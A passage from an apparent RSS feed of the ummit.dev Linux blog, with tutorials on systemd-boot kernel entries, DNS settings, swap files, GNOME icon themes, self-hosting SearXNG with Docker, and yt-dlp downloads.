The Linux kernel forms the foundation of every Linux-based operating system, playing a vital role in hardware interactions and resource management. With the regular release of new kernel versions, users often seek to switch between them for reasons like compatibility testing and performance optimization. In this blog post, we&apos;ll delve into the process of utilizing systemd-boot and Bootctl to efficiently manage and boot into distinct Linux kernel versions through the creation of new configuration entries.

### **Understanding systemd-boot and Bootctl**

Systemd-boot, an integral component of the systemd project, is a straightforward UEFI boot manager. It empowers users to choose and boot into diverse operating systems or kernel versions during system startup. Bootctl serves as the command-line interface for configuring systemd-boot settings.

### **Prerequisites**

Before embarking on the journey, ensure you meet these prerequisites:
- A Linux-based operating system configured with systemd-boot as the bootloader.
- Basic familiarity with command-line interactions.
- Administrative (root) privileges.

### **Steps to Use Different Linux Kernel Versions**

Now that we understand the significance of managing Linux kernel versions and the role of systemd-boot and Bootctl, let&apos;s dive into the process of configuring new boot options. This section will guide you through the steps required to set up your system to seamlessly switch between different Linux kernel versions according to your needs.

#### **Step 1: Identify Available Kernel Versions**

Initiate your exploration by listing the kernel versions available on your system. Open a terminal and execute this command:

```shell
ls /boot/vmlinuz*
```

This will provide you with a list of available kernel images on your system.
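
Each file is named `vmlinuz-` followed by the kernel (or package) version. If you want the bare version strings, strip the prefix; the loop below uses sample names, but you can point it at `/boot/vmlinuz*` on a real system:

```shell
# Strip the "vmlinuz-" prefix from each image name.
for img in vmlinuz-linux vmlinuz-linux-lts vmlinuz-6.4.12; do
    VER=${img#vmlinuz-}
    echo "$VER"
done
```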

#### **Step 2: Create a New Configuration Entry**

1. Navigate to the directory housing systemd-boot configuration entries:
```shell
cd /boot/loader/entries
```

2. Craft a fresh configuration file for your preferred kernel version (e.g., `my_kernel.conf`) using a text editor such as `nano` or `vim`:
```shell
sudo nano my_kernel.conf
```

3. In the configuration file, outline the entry&apos;s specifics. Replace `&lt;kernel_version&gt;` with the actual version you intend to use:
```conf
title My Custom Kernel
linux /vmlinuz-&lt;kernel_version&gt;
initrd /initramfs-&lt;kernel_version&gt;.img
options root=UUID=&lt;root_partition_UUID&gt; ro
```

- `title`: A user-friendly title for the entry.
- `linux`: Path to the kernel image file.
- `initrd`: Path to the initial RAM disk image.
- `options`: Kernel command-line options.

4. Save the configuration file and exit the text editor.

#### **Step 3: Reboot and Select Kernel**

1. Reboot your system to encounter the freshly added entry within the systemd-boot menu:
```shell
sudo reboot
```

After rebooting, your freshly added entry appears in the systemd-boot menu alongside the existing ones; simply select it to boot the corresponding kernel.

By seamlessly configuring and utilizing these new boot options, you&apos;ve enhanced your system&apos;s flexibility, enabling you to effortlessly switch between different Linux kernel versions according to your requirements.

This newfound capability allows you to tap into kernel advancements, optimize performance, and conduct compatibility tests with ease. However, always exercise caution and maintain backups before making any significant changes to your system&apos;s configuration.

### **Conclusion**

Harnessing the prowess of systemd-boot and Bootctl for managing diverse Linux kernel versions empowers users to leverage kernel improvements and evaluate compatibility. Through the creation of novel configuration entries and the utilization of systemd-boot&apos;s intuitive boot menu, transitioning between kernel versions that align with your needs becomes seamless. Exercise caution and maintain backups before making system configuration changes.

Remember, improper alterations to bootloader and kernel configurations can lead to unintended consequences. Always exercise prudence, conduct thorough research, and proceed with caution when modifying system settings.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Changing DNS Servers on Linux</title><link>https://ummit.dev//posts/linux/undefine/change-your-dns-server-on-linux/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/change-your-dns-server-on-linux/</guid><description>Learn how to improve your network performance by changing DNS servers on Linux. Configure popular DNS servers like Cloudflare DNS and Google DNS to enhance your browsing experience.</description><pubDate>Sat, 19 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Efficient network connectivity is vital for a seamless online experience. One way to enhance your network performance is by utilizing faster and more reliable DNS (Domain Name System) servers. In this guide, we&apos;ll show you how to change DNS servers on a Linux system by modifying the `/etc/resolv.conf` file. We&apos;ll focus on configuring two popular DNS servers: Cloudflare DNS and Google DNS. By the end of this tutorial, you&apos;ll have the tools to optimize your network&apos;s performance and responsiveness.

## Understanding DNS Servers

DNS servers are crucial in translating human-readable domain names (e.g., www.example.com) into IP addresses that computers understand. Using faster and more reliable DNS servers can significantly reduce the time it takes to resolve domain names, resulting in quicker website loading times.

## Configuring DNS Servers

Configuring DNS servers on your Linux system involves editing a specific configuration file. Below, we&apos;ll guide you through the process of configuring popular DNS servers such as Cloudflare DNS and Google DNS.

### Using Cloudflare DNS (1.1.1.1 and 1.0.0.1)

Cloudflare DNS is renowned for its impressive speed, often outperforming other DNS servers. To set up your Linux system to utilize Cloudflare DNS, follow these steps:

1. Open a terminal window.

2. Edit the `/etc/resolv.conf` file using a text editor such as `nano` or `vim`:

   ```shell
   sudo nano /etc/resolv.conf
   ```

3. Add the following lines at the top of the file:

   ```shell
   nameserver 1.1.1.1
   nameserver 1.0.0.1
   ```

These lines specify the Cloudflare DNS servers for domain name resolution.
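
After saving the file, a minimal `/etc/resolv.conf` might look like this (the `options` line is optional and shown purely as an illustration):

```shell
# /etc/resolv.conf
nameserver 1.1.1.1
nameserver 1.0.0.1
# Optional: fail over to the next server after 2 seconds
options timeout:2
```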

### Using Google DNS (8.8.8.8 and 8.8.4.4)

Google DNS is another popular choice, valued for its reliability and performance. To configure your system to use Google DNS, follow these steps:

1. Open a terminal window.

2. Edit the `/etc/resolv.conf` file:

   ```shell
   sudo nano /etc/resolv.conf
   ```

3. Add the following lines:

   ```shell
   nameserver 8.8.8.8
   nameserver 8.8.4.4
   ```

These lines indicate the Google DNS servers for your domain resolution needs.

With these configurations in place, your Linux system will utilize either Cloudflare DNS or Google DNS for translating domain names to IP addresses. This can result in improved speed and responsiveness, ultimately enhancing your online experience.
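
One caveat: on many modern distributions, `/etc/resolv.conf` is managed by a service such as NetworkManager or systemd-resolved, and manual edits may be overwritten on reboot or when the connection changes. If NetworkManager manages the file on your system, one common approach (shown as an illustration, not the only option) is a drop-in that tells it to leave `/etc/resolv.conf` alone:

```plaintext
# /etc/NetworkManager/conf.d/dns.conf
[main]
dns=none
```

After adding this file and restarting NetworkManager, your manual `nameserver` entries will persist.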

## Installation on Arch-Based Linux

If you&apos;re using an Arch-Based Linux distribution, such as Arch Linux or Manjaro, you can easily install the necessary tools for working with DNS settings. The `dnsutils` package provides essential utilities like `nslookup` and `dig`. To install this package, follow these steps:

1. Open a terminal window.

2. Run the following command to install the `dnsutils` package:

   ```shell
   sudo pacman -S dnsutils
   ```

This will install the required tools for DNS-related tasks on your Arch-Based system. (On recent Arch releases, `dnsutils` has been merged into the `bind` package, so if pacman cannot find `dnsutils`, install `bind` instead.)

### Verifying Your Configured DNS Server

After configuring your DNS server, it&apos;s important to verify that your Linux system is indeed using the desired DNS server. You can achieve this by using the `dig` command in combination with `grep` to extract relevant information. Follow these steps:

1. Open a terminal window.

2. Enter the following command:

   ```shell
   dig | grep &quot;SERVER&quot;
   ```

This command will display the DNS server information currently in use by your system. By performing this check, you can ensure that your chosen DNS server has been successfully configured and is actively being utilized for domain name resolution.

## Conclusion

Changing DNS servers on your Linux system is a straightforward way to enhance network performance and reduce latency. By configuring popular DNS servers like Cloudflare DNS (1.1.1.1 and 1.0.0.1) or Google DNS (8.8.8.8 and 8.8.4.4), you can experience faster and more reliable domain name resolution. Whether you&apos;re looking to streamline your browsing experience or optimize online activities, adjusting your DNS settings can make a significant impact on your network&apos;s responsiveness.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Creating a Swap File on Your Linux VPS</title><link>https://ummit.dev//posts/linux/self-host/linux-vps-create-swap/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/self-host/linux-vps-create-swap/</guid><description>Enhance your Linux VPS&apos;s performance and memory management by adding a swap file. Follow our detailed walkthrough to learn how to create a swap file on your Linux VPS.</description><pubDate>Mon, 14 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Adding a swap file to your Linux Virtual Private Server (VPS) can significantly enhance system performance and optimize memory management. In this guide, we will provide a step-by-step walkthrough to help you create a swap file on your Linux VPS.

## Why Enable Swap?

Enabling swap on your Linux VPS system can significantly enhance its performance and ensure smoother operations. Linux is renowned for its ability to run efficiently on low-spec hardware, making it possible to operate servers even with limited resources such as 512MB RAM or 1GB RAM. However, there are instances when these resources may prove inadequate for certain workloads.

This is where a swap file comes into play. It acts as a supplementary form of memory that the system can utilize when physical RAM is exhausted. Here&apos;s why enabling swap is beneficial:

1. **Improved Multitasking:** Swap facilitates smoother multitasking by providing supplementary memory capacity for processes and applications to operate effectively. This enhanced memory management ensures your VPS can seamlessly handle multiple tasks simultaneously.

2. **Memory Safety Net:** In scenarios where memory-intensive processes surge unexpectedly, swap acts as a safety net, preventing your system from becoming unresponsive or crashing. This safety mechanism ensures the stability of your VPS during varying workloads.

3. **Smooth Operations:** With swap in place, your VPS can gracefully navigate through instances of high memory demand. This results in consistently smooth and reliable performance, even during periods of resource strain.

4. **Optimal Performance:** By harmonizing physical RAM with swap space, your VPS achieves an equilibrium that optimizes its performance. This equilibrium empowers your system to proficiently manage memory-intensive tasks without compromising its overall responsiveness.

5. **Enhanced Workload Capacity:** Enabling swap effectively broadens the spectrum of tasks your VPS can adeptly handle. By extending its capabilities through additional memory, your system becomes more adaptable to diverse workloads, ensuring a seamless user experience regardless of hardware limitations.

Enabling swap effectively extends the capabilities of your VPS, allowing it to handle a broader range of workloads and ensuring a seamless user experience, even when operating with modest hardware resources.

## Step 1: Checking Existing Swap Space (Optional)

Before proceeding with creating a new swap file, it&apos;s advisable to check if your VPS already has active swap space. Open a terminal and run the following command:

```shell
sudo swapon --show
```

If there is no output, your VPS likely doesn&apos;t have active swap space, making it an ideal candidate for creating a new swap file.
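
If swap is already active, the command lists each swap device or file with its size and current usage. The values below are illustrative:

```plaintext
NAME      TYPE SIZE USED PRIO
/swapfile file   2G   0B   -2
```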

## Step 2: Creating the Swap File

To create a 2GB swap file, follow these steps:

1. Connect to your VPS via SSH.

2. Execute the following command to create a 2GB swap file (you can adjust the size as needed):

```shell
sudo fallocate -l 2G /swapfile
```

3. Set appropriate permissions for the swap file:

```shell
sudo chmod 600 /swapfile
```

4. Prepare the swap file:

```shell
sudo mkswap /swapfile
```
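
If `fallocate` is unavailable, or your filesystem does not support it for swap files, `dd` can create the file instead. Run this in place of the `fallocate` step above, then continue with `chmod` and `mkswap` as shown:

```shell
# Write 2048 one-megabyte blocks of zeros to create a 2GB swap file
sudo dd if=/dev/zero of=/swapfile bs=1M count=2048 status=progress
```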

## Step 3: Enabling the Swap File

Once the swap file is created, enable it with the following command:

```shell
sudo swapon /swapfile
```

## Step 4: Making the Swap File Permanent

Ensuring the swap file remains active after a system reboot requires an entry in the `/etc/fstab` file, which defines the filesystems and devices (including swap space) that are set up at boot. The entry ends with `defaults 0 0`, where:

- **`defaults`:** A standard set of mount options, including `rw` (read-write) and `auto` (automatic mounting during boot).
- **First `0`:** Controls whether the filesystem is backed up by the `dump` utility. Swap space is never backed up, so this is set to 0.
- **Second `0`:** Sets the order in which `fsck` checks filesystems at boot. Swap space is not checked, so this is also set to 0.

In simpler terms, `defaults 0 0` mounts the swap file automatically at boot, excludes it from `dump` backups, and skips filesystem checks.

Now, let&apos;s put this into practice:

1. Open the `/etc/fstab` file with a text editor such as nano:

```shell
sudo nano /etc/fstab
```

2. Add the following line at the end of the file:

```plaintext
/swapfile swap swap defaults 0 0
```

3. Alternatively, you can append the required entry to `/etc/fstab` with a single command:

```shell
sudo sh -c &quot;echo &apos;/swapfile swap swap defaults 0 0&apos; &gt;&gt; /etc/fstab&quot;
```

With this command, the required entry is appended to `/etc/fstab` in one step.

- **`sudo`:** Runs the command that follows with superuser privileges, which are needed to modify `/etc/fstab`.
- **`sh -c`:** Invokes a shell (`sh`) with the `-c` flag to execute the command string that follows.
- **`&quot;echo &apos;/swapfile swap swap defaults 0 0&apos; &gt;&gt; /etc/fstab&quot;`:** The `echo` command prints the entry (`/swapfile swap swap defaults 0 0`), and the `&gt;&gt;` operator appends it to `/etc/fstab`.

The `sh -c` wrapper matters here: a plain `sudo echo ... &gt;&gt; /etc/fstab` would fail, because the redirection would be performed by your unprivileged shell rather than by root. Wrapping the whole command in `sh -c` runs the redirection with elevated privileges as well.

## Step 5: Adjusting Swappiness (Optional)

Swappiness is a kernel parameter that controls the tendency of the Linux system to move processes out of physical memory (RAM) and onto the swap file. By adjusting the swappiness value, you can fine-tune how aggressively your system uses swap space.

Here&apos;s how you can do it:

1. Open the `/etc/sysctl.conf` file using a text editor like nano:

```shell
sudo nano /etc/sysctl.conf
```

2. Add the following line at the end of the file, adjusting the value to your preference (replace `10` with your desired value):

```plaintext
vm.swappiness=10
```

   The swappiness value ranges from 0 to 100. A lower value, like 10, means the system will use swap space less aggressively, favoring physical memory. A higher value, like 60, makes the system more willing to use swap space.

3. Save the file and exit the text editor.

Modifying the swappiness value can be particularly useful if you have sufficient RAM, and you want to minimize the use of swap space unless it&apos;s absolutely necessary. Conversely, if you find your system frequently using swap even when there&apos;s available RAM, you might consider raising the swappiness value to make more use of the swap space.

## Step 6: Rebooting Your VPS

To bring the changes into effect, initiate a reboot of your VPS:

```shell
sudo reboot
```

## Step 7: Verifying Swap Activation

Ensuring the successful activation of your swap file is imperative. You can employ tools like `htop`, `btop`, or the command `swapon --show` to validate the presence and utilization of your swap space.

- **htop:** Launch the `htop` utility to visualize system processes and memory usage. Look for the swap entry in the memory information section.

- **btop:** Similarly, you can use `btop` to monitor system resources. Check for swap information in the displayed data.

- **`swapon --show`:** Alternatively, execute the command `swapon --show` in the terminal. This will provide a concise overview of active swap devices and their respective sizes.

Confirming the presence and engagement of swap space ensures that your VPS is equipped to gracefully manage memory and handle resource-intensive tasks.

## Bonus: Deleting a Swap File (If Needed)

If you find yourself needing to remove the swap file from your Linux VPS, you can follow these steps:

1. **Disable Swap**: To begin, deactivate the swap file using the following command. This command includes the `--verbose` option to provide detailed feedback on the operation:

   ```shell
   sudo swapoff --verbose /swapfile
   ```

   The `--verbose` flag ensures that you receive clear feedback about the deactivation process. This step is crucial before proceeding with the removal of the swap file.


2. **Remove the Entry from /etc/fstab**: Open the `/etc/fstab` file in a text editor:

   ```shell
   sudo nano /etc/fstab
   ```

    **[Optional] One-line Solution:** To remove the line associated with the swap file from `/etc/fstab`, which typically resembles `/swapfile swap swap defaults 0 0`, you have two options. First, manually locate and delete the line. Alternatively, you can use a single command to achieve this by employing `sed`:

    ```shell
    sudo sed -i &apos;/\/swapfile/d&apos; /etc/fstab
    ```

After executing the command, save the file and exit the text editor to complete the process. Please exercise caution when using the `sed` command, as it directly modifies files. Always ensure you have proper backups or are confident in the changes you are making.
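
To see exactly which lines the `sed` command would delete before modifying anything, run it in print-only mode first (a dry-run sketch):

```shell
# Print only the lines that the delete command above would remove
sed -n &apos;/\/swapfile/p&apos; /etc/fstab
```

If the output shows only the swap entry, the in-place deletion is safe to run.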

3. **Delete the Swap File**: Finally, delete the swap file using:

   ```shell
   sudo rm /swapfile
   ```

   Confirm the deletion if prompted.


Remember, removing a swap file can impact your system&apos;s performance, so make sure to consider your system&apos;s requirements before proceeding with the deletion.

## Conclusion

By understanding the process of creating, adjusting, and if necessary, deleting a swap file, you have gained valuable insights into managing memory on your Linux VPS. These techniques empower you to fine-tune your system&apos;s performance and ensure optimal resource utilization, even during resource-intensive tasks.

## Reference

- https://phoenixnap.com/kb/linux-swap-file</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Customizing Your GNOME Desktop with Installing Icon and cursor themes</title><link>https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-customize-icon-and-cursor-theme/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/desktop-environment/gnome/gnome-customize-icon-and-cursor-theme/</guid><description>Personalize your GNOME desktop on Linux by installing icon and cursor themes. Easily transform your desktop&apos;s appearance using the GNOME Tweaks tool.</description><pubDate>Mon, 14 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Customizing your GNOME desktop environment is a great way to add a personal touch and make your Linux experience truly your own. One of the easiest and most visually impactful ways to do this is by installing icon and cursor themes. In this guide, we&apos;ll walk you through the process of installing an icon and cursor theme on your GNOME desktop using the GNOME Tweaks tool.

### Why Install Icon Themes?

Icon themes provide a quick and effective way to transform the look and feel of your GNOME desktop. By changing the icons used for applications, folders, system elements and cursor themes, you can give your desktop a fresh and unique appearance that reflects your style.

### Where is the Location Path?

When you install icon themes, they are stored in specific directories on your system. Here are the paths where these themes are located:

&gt; **Note:** The global path applies changes system-wide for all users, while the local path affects only the current user.

#### Global Path

The following is the directory where system-wide icon themes are stored:

```shell
/usr/share/icons/
```

#### Local Path

For individual user-specific icon themes, the path is:

```shell
~/.local/share/icons/
```

These paths play a crucial role in determining the appearance of your icons across the system. Whether you choose a global or local installation, these directories ensure that your selected icon themes are accessible and enhance the visual experience of your desktop environment.
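
If you download a theme as an archive instead of installing it from a package manager, extracting it into the local path is usually all that&apos;s required. The archive name below is a placeholder for whichever theme you downloaded:

```shell
# Create the per-user icon directory if it does not exist yet
mkdir -p ~/.local/share/icons
# Extract the downloaded theme archive into it (archive name is illustrative)
tar -xf MyIconTheme.tar.gz -C ~/.local/share/icons/
```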

## Step 1: Install GNOME Tweaks

Before you start the installation process, make sure you have GNOME Tweaks installed. GNOME Tweaks is a powerful tool that allows you to customize various aspects of your GNOME desktop, including themes, icons, fonts, and more.

### Option 1: Using Package Manager (Ubuntu/Debian)

If you&apos;re using Ubuntu or a Debian-based distribution, you can install GNOME Tweaks using the package manager. Open your terminal and enter the following command:

```bash
sudo apt install gnome-tweaks
```

### Option 2: Using Package Manager (Fedora)

For Fedora users, you can install GNOME Tweaks using the package manager. Open your terminal and enter the following command:

```bash
sudo dnf install gnome-tweaks
```

### Option 3: Using Package Manager (Arch Linux)

Arch Linux users can install GNOME Tweaks with the following command:

```bash
sudo pacman -S gnome-tweaks
```

## Step 2: Choose an Icon Theme

Before you start the installation process, you need to choose an icon theme that resonates with you. There are numerous icon themes available, each with its own design and aesthetic. For this guide, we&apos;ll demonstrate the installation of the popular &quot;Papirus&quot; icon theme.

## Step 3: Installation - Icon theme

Once you have GNOME Tweaks installed, it&apos;s time to add a new icon theme to your system. On Arch-based systems you can install it with the pacman package manager or from the AUR; follow whichever option applies to you.

### Option 1: Using Pacman (Official Repositories)

If you&apos;re using Arch Linux or an Arch-based distribution, you can install the Papirus icon theme using the package manager. Open your terminal and enter the following command:

```bash
sudo pacman -S papirus-icon-theme
```

This command will fetch and install the Papirus icon theme from the official Arch Linux repositories.

### Option 2: Using the AUR (Arch User Repository)

Alternatively, you can install the `papirus-icon-theme-git` package from the Arch User Repository (AUR). First, ensure you have an AUR helper like `yay` installed. Then, use the following command:

```bash
yay -S papirus-icon-theme-git
```

The AUR version might provide the latest updates and features of the Papirus icon theme.

## Step 4: Installation - Cursor theme

&gt; **Note:** Cursor themes use the same installation method and are stored in the same paths as icon themes.

The [Bibata Modern Ice theme](https://github.com/ful1e5/Bibata_Cursor) is a great choice. Install it with:

```shell
yay -S bibata-cursor-theme
```

## Step 5: Update cache

After installing the icon theme, you&apos;ll want to update the icon cache to ensure that your system recognizes the new icons. This is important because sometimes newly installed themes might not work immediately. To update the icon cache, run the following command:

```shell
sudo gtk-update-icon-cache -q -t -f /usr/share/icons/Papirus
```

By following either of these options and updating the icon cache, you can easily enhance your GNOME desktop with the stylish Papirus icon theme, giving your system a fresh and visually appealing look.

## Step 6: Applying the Icon Theme

Once you have successfully installed the icon theme, you can apply it to your GNOME desktop using GNOME Tweaks.

1. **Open GNOME Tweaks:** Press the `Super` key (Windows key) and search for &quot;Tweaks.&quot; Click on the &quot;Tweaks&quot; application to open it.

2. **Select Icons:** In the left sidebar of GNOME Tweaks, click on &quot;Appearance.&quot; Under the &quot;Icons&quot; section, you&apos;ll see a dropdown menu. Click on it and select the &quot;Papirus&quot; icon theme.

3. **Enjoy Your New Icons:** The selected icon theme will be applied immediately. You&apos;ll notice that the icons for applications, folders, and system elements have changed according to the theme you chose.

## Exploring Further

Installing an icon theme is just the beginning of customizing your GNOME desktop. You can further enhance your experience by tweaking other aspects of the desktop, such as the GTK theme, shell theme, and extensions. With each customization, you can create a desktop environment that truly reflects your style and preferences.

Remember that the world of Linux offers a plethora of icon themes to choose from. Feel free to explore different themes until you find the one that speaks to you the most.

## Conclusion

Customizing your GNOME desktop with icon themes using the GNOME Tweaks tool is a fantastic way to express your creativity and personalize your Linux experience. The process is straightforward, and you can easily switch between different themes to find the one that suits you best. Whether you prefer a sleek and modern look or a more playful and artistic vibe, icon themes allow you to transform your desktop into a visual masterpiece.

## References

- [10 Best Cursor Themes for Linux Desktops](https://www.debugpoint.com/best-cursor-themes/)
- [Bibata Modern Ice](https://www.gnome-look.org/p/1197198/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Setting up SearXNG on your SSH VPS Server with Docker</title><link>https://ummit.dev//posts/linux/self-host/searxng-selfhost-on-your-vps/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/self-host/searxng-selfhost-on-your-vps/</guid><description>Set up your private SearXNG metasearch engine on an SSH VPS server using Docker. Follow this concise guide to quickly install, customize, and maintain SearXNG.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

SearXNG is a powerful metasearch engine that respects your privacy by aggregating results from various search engines while not tracking your searches. In this guide, we&apos;ll show you how to quickly set up a SearXNG instance on your SSH VPS server using Docker.

## What&apos;s Included?

The SearXNG Docker setup includes the following components:

| Name      | Description                                     | Docker image                        | Dockerfile                                |
| --------- | ----------------------------------------------- | ----------------------------------- | ----------------------------------------- |
| Caddy     | Reverse proxy with automatic Let&apos;s Encrypt certs | [caddy/caddy:2-alpine](https://hub.docker.com/_/caddy) | [Dockerfile](https://github.com/caddyserver/caddy-docker) |
| SearXNG   | SearXNG search engine                          | [searxng/searxng:latest](https://hub.docker.com/r/searxng/searxng) | [Dockerfile](https://github.com/searxng/searxng/blob/master/Dockerfile) |
| Redis     | In-memory database                             | [redis:alpine](https://hub.docker.com/_/redis) | [Dockerfile-alpine.template](https://github.com/docker-library/redis/blob/master/Dockerfile-alpine.template) |

## Buying a Domain and VPS Server

Before diving into the installation process, you need both a domain name and a VPS server. You can purchase a domain from platforms like Cloudflare, Namecheap, and others. Likewise, you can choose reputable VPS providers such as Linode, DigitalOcean, or AWS Lightsail to host your SearXNG instance.

1. **Acquire a Domain:**
   Purchase a domain name from a domain registrar like Cloudflare or Namecheap. This will be the web address through which you access your SearXNG instance.

2. **Choose a VPS Provider:**
   Select a reliable VPS provider such as Linode, DigitalOcean, or AWS Lightsail. Ensure that the chosen provider meets your requirements in terms of server resources and location.

### Step 1: Configure DNS Settings

For your domain to point to your VPS server, you&apos;ll need to configure DNS settings:

1. **Obtain Server IP Address:**
   After setting up your VPS server, copy the real IP address of your server. You&apos;ll need this IP address to configure DNS settings.

2. **Configure DNS Records:**
   Access the DNS management interface of your domain registrar. Add an A record that points to your VPS server&apos;s IP address. This step ensures that your domain directs visitors to your SearXNG instance.

## Step 2: Prepare Your System and Install Docker

Before setting up SearXNG with Docker, make sure your system is up to date and has the necessary tools installed. Follow these steps:

1. **Update and Upgrade:**
   Open a terminal and update your package repositories and upgrade installed packages:

   ```shell
   sudo apt update -y
   sudo apt upgrade -y
   ```

2. **Install Docker and Docker Compose:**
   Install Docker and Docker Compose using the following commands:

   ```shell
   sudo apt install docker.io docker-compose -y
   ```

## Step 3: Clone the SearXNG Docker Repository

Continue with the installation process by cloning the SearXNG Docker repository:

```shell
cd /usr/local/
git clone https://github.com/searxng/searxng-docker.git
cd searxng-docker
```

## Step 4: Set Up Environment and Generate Secret Key

Customize your SearXNG environment by editing the `.env` file in the `searxng-docker` directory. Follow these steps:

1. Open the `.env` file using your preferred text editor:

   ```shell
   nano /usr/local/searxng-docker/.env
   ```

2. Replace `&lt;host&gt;` with your desired SearXNG hostname and `&lt;email&gt;` with your email address to set up a Let&apos;s Encrypt certificate.

   Example:

   ```shell
   SEARXNG_HOSTNAME=mysearxng.example.com
   LETSENCRYPT_EMAIL=you@example.com
   ```

   Save the changes and exit the text editor.

3. Generate a secret key for SearXNG by executing the following command:

   ```shell
   sed -i &quot;s|ultrasecretkey|$(openssl rand -hex 32)|g&quot; /usr/local/searxng-docker/searxng/settings.yml
   ```

   This ensures a secure configuration for your SearXNG instance.

### Example of **.env**

Here&apos;s an example of how your `.env` file might look:

```shell
# By default listen on https://localhost
# To change this:
# * uncomment SEARXNG_HOSTNAME, and replace &lt;host&gt; by the SearXNG hostname
# * uncomment LETSENCRYPT_EMAIL, and replace &lt;email&gt; by your email (required for Let&apos;s Encrypt certificate)

SEARXNG_HOSTNAME=mysearxng.example.com
LETSENCRYPT_EMAIL=you@example.com
```

These steps will ensure a tailored environment for your SearXNG setup.

## Step 5: Customize Settings

Edit the `searxng/settings.yml` file according to your preferences and needs.

### Example of **settings.yml**

Here&apos;s an example of how your `settings.yml` file might look:

```shell
# see https://docs.searxng.org/admin/engines/settings.html#use-default-settings
use_default_settings: true
server:
  # base_url is defined in the SEARXNG_BASE_URL environment variable, see .env and docker-compose.yml
  secret_key: &quot;your_keys&quot;  # change this!
  limiter: true  # can be disabled for a private instance
  image_proxy: true
  method: &quot;GET&quot;
ui:
  static_use_hash: true
  default_theme: simple
  theme_args:
    simple_style: dark
redis:
  url: redis://redis:6379/0
general:
  instance_name:  &quot;SearXNG  - Search Engine&quot;
search:
  safe_search: 0
  autocomplete: &quot;&quot;
  default_lang: &quot;&quot;
```

## Step 6: Start SearXNG

Ensure everything is set up correctly by starting the SearXNG instance:

```shell
sudo docker-compose up -d
```

This will launch the SearXNG stack and keep it running in the background, allowing you to continue using the terminal for other tasks.

## Step 7: Verify and Access SearXNG

With SearXNG running in the background, you can now access it through your web browser. Open your browser and enter the hostname you configured earlier, prefixed with `https://`. You should see the SearXNG search interface, ready for private and efficient searches.

## Updating Your SearXNG Instance

Ensuring your SearXNG instance is up-to-date is crucial for maintaining security and performance. To update your SearXNG stack, follow these simplified steps:

1. **Stop and Remove Containers:**
   Open a terminal and navigate to the `searxng-docker` directory. Stop and remove the current SearXNG containers:

   ```shell
   cd /usr/local/searxng-docker
   sudo docker-compose down
   ```

2. **Pull Latest Docker Images:**
   After stopping the containers, pull the latest SearXNG Docker images to ensure you have the most recent updates:

   ```shell
   sudo docker-compose pull
   ```

3. **Start Updated Stack in Background:**
   Start the updated SearXNG stack in the background:

   ```shell
   sudo docker-compose up -d
   ```

By following these three simple steps, you&apos;ll successfully update your SearXNG instance, ensuring an improved and secure search experience.

## Conclusion

Setting up your own SearXNG instance with Docker is a streamlined process. The provided `docker-compose.yml` file is comprehensive, but the official `docker-compose` README may not be the most approachable resource for everyone, which is why this guide breaks the setup down into clearer, step-by-step instructions.

Docker Compose abstracts the complexity of managing containers and services; the steps above show how the Caddy, SearXNG, and Redis services work together to bring your metasearch engine to life.

Feel confident in using Docker Compose to set up and maintain your SearXNG instance. This guide empowers you to create your private, efficient, and privacy-respecting search engine.

### Keeping Your System and SearXNG Up to Date

To maintain the security and optimal performance of your SearXNG instance and the underlying Linux system, remember to:

- Regularly apply updates to your Linux system.
- Periodically update your SearXNG using Docker Compose.

By adhering to these practices, you ensure that both your SearXNG instance and your system remain current and resilient.

## Reference

- https://github.com/searxng/searxng-docker</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>yt-dlp Command Line Tools: A Comprehensive Guide</title><link>https://ummit.dev//posts/linux/tools/yt-dlp/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/yt-dlp/</guid><description>Learn how to use yt-dlp&apos;s command-line tools to download videos, audio tracks, and customize number formats for a more organized media library.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

This guide walks you through the command-line tools of yt-dlp, a powerful utility for downloading videos and audio tracks from various streaming platforms. yt-dlp offers a wide range of features, including video format selection, audio extraction, chapter handling, subtitle management, and more.

## Simple and Straightforward Video Download

For a quick and straightforward video download without additional commands, use the following:

```bash
yt-dlp [video URL]
```

## Listing Video Formats

To view available video formats and their details, you can use the following command:

```shell
yt-dlp -F [video URL]
```

This command provides a detailed list of available formats, including resolution, file size, codecs, and more. The output helps you choose the desired format for your download.

### Targeting Specific Format ID

After listing the available formats, you can target specific format IDs to download the video in those formats. Use the IDs exactly as they appear in the `-F` output rather than assuming higher numbers mean better quality:

```shell
yt-dlp -f 248+251 [video URL]
```

This command selects the video (ID 248) and audio (ID 251) formats, merging them into a single file.
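If you&apos;d rather not pick numeric IDs every time, yt-dlp also accepts format selector keywords. For example, `bestvideo+bestaudio/best` downloads the best available video and audio streams, falling back to the best combined format (`[video URL]` is a placeholder as in the other examples):

```shell
yt-dlp -f bestvideo+bestaudio/best [video URL]
```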

### Targeting Specific Extension Type

If you prefer a specific extension type, such as mp4, you can use:

```shell
yt-dlp -f mp4 [video URL]
```

This command filters the formats to include only those with the mp4 extension, simplifying your download preferences.

## Extracting Audio from a Video

Sometimes, you might only be interested in the audio content of a video, especially for music tracks. To extract the audio from a video, use the following command:

```bash
yt-dlp -x --audio-format mp3 [video URL]
```

This command tells yt-dlp to extract the audio (`--extract-audio` or `-x`) and convert it to the MP3 format (`--audio-format mp3`).

## Batch Downloading with a List

Batch downloading is useful when you want to download multiple videos in one go, without pasting URLs into the command one by one. Here&apos;s how you can achieve this with yt-dlp:

1. You will need to create a text file containing the URLs of the videos you want to download. Each URL should be on a separate line.
2. Save the text file with a name that is easy to remember, such as `video_list`.
3. Execute the following command to initiate the batch download:

```bash
yt-dlp --batch-file path/to/video_list
```
